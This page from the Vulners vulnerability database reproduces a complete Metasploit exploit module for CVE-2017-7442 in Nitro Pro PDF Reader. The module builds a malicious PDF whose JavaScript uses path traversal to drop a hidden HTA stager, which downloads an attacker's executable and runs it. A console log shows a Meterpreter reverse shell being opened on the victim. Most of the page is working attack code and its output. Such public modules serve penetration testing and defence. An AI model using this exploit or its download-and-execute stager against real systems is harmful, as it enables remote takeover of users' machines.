Vulners
Lucene search
Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit)
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution Exploit | 2 Aug 201700:00 | – | zdt |
 | CVE-2017-7442 | 2 Aug 201700:00 | – | circl |
 | Nitro Pro Arbitrary Code Execution Vulnerability | 3 Aug 201700:00 | – | cnvd |
 | Nitro Pro PDF Reader JavaScript API Remote Code Execution (CVE-2017-7442) | 13 Aug 201700:00 | – | checkpoint_advisories |
 | CVE-2017-7442 | 3 Aug 201708:00 | – | cve |
 | CVE-2017-7442 | 3 Aug 201708:00 | – | cvelist |
 | Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution | 24 Jul 201715:21 | – | metasploit |
 | CVE-2017-7442 | 3 Aug 201708:29 | – | nvd |
 | Nitro Pro 'saveAs and launchURL' Code Execution Vulnerability - Windows | 8 Aug 201700:00 | – | openvas |
 | CVE-2017-7442 | 3 Aug 201708:29 | – | osv |
10
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
'Description' => %q{
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
PDF Reader version 11. The saveAs() Javascript API function allows for writing
arbitrary files to the file system. Additionally, the launchURL() function allows
an attacker to execute local files on the file system and bypass the security dialog
Note: This is 100% reliable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!
'sinn3r' # help with msf foo!
],
'References' =>
[
[ 'CVE', '2017-7442' ],
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'Platform' => 'win',
'Targets' =>
[
# truly universal
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jul 24 2017',
'DefaultTarget' => 0))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
])
deregister_options('SSL', 'SSLVersion', 'SSLCert')
end
def build_vbs(url, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
vbs = %Q|<head><hta:application
applicationname="#{@payload_name}"
border="none"
borderstyle="normal"
caption="false"
contextmenu="false"
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
maximizebutton="false"
minimizebutton="false"
navigable="false"
scroll="false"
selection="false"
showintaskbar="No"
sysmenu="false"
version="1.0"
windowstate="Minimize"></head>
<style>* { visibility: hidden; }</style>
<script language="VBScript">
window.resizeTo 1,1
window.moveTo -2000,-2000
</script>
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
<script language="VBScript">
On Error Resume Next
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
#{name_xmlhttp}.open "GET","http://#{url}",False
#{name_xmlhttp}.send
Set #{name_adodb} = CreateObject("ADODB.Stream")
#{name_adodb}.Open
#{name_adodb}.Type=1
#{name_adodb}.Write #{name_xmlhttp}.responseBody
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
set shellobj = CreateObject("wscript.shell")
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
</script>|
vbs.gsub!(/ /,'')
return vbs
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending second stage payload")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
end
def exploit
# In order to save binary data to the file system the payload is written to a .vbs
# file and execute it from there.
@payload_name = rand_text_alpha(4)
@temp_folder = "/Windows/Temp"
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
if datastore['SRVHOST'] == '0.0.0.0'
lhost = Rex::Socket.source_address('50.50.50.50')
else
lhost = datastore['SRVHOST']
end
payload_src = lhost
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
stager_name = rand_text_alpha(6) + ".vbs"
pdf = %Q|%PDF-1.7
4 0 obj
<<
/Length 0
>>
stream
|
pdf << build_vbs(payload_src, stager_name)
pdf << %Q|
endstream endobj
5 0 obj
<<
/Type /Page
/Parent 2 0 R
/Contents 4 0 R
>>
endobj
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction [ 5 0 R /Fit ]
/Names <<
/JavaScript <<
/Names [ (EmbeddedJS)
<<
/S /JavaScript
/JS (
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
)
>>
]
>>
>>
>>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
endobj
3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer <<
/Size 6
/Root 1 0 R
>>
startxref
327
%%EOF|
pdf.gsub!(/ /,'')
file_create(pdf)
super
end
end
=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
[*] Processing scripts/nitro.rc for ERB directives.
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/nitro.rc)> exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.175.1:4444
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.100.4:8080/
[*] Server started.
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
[*] Sending stage (957487 bytes) to 172.16.175.232
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
[+] Deleted C:/Windows/Temp/UOIr.hta
msf exploit(nitro_reader_jsapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2412 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\researcher\Desktop>
=endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Aug 2017 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
CVSS 38.8
EPSS0.70304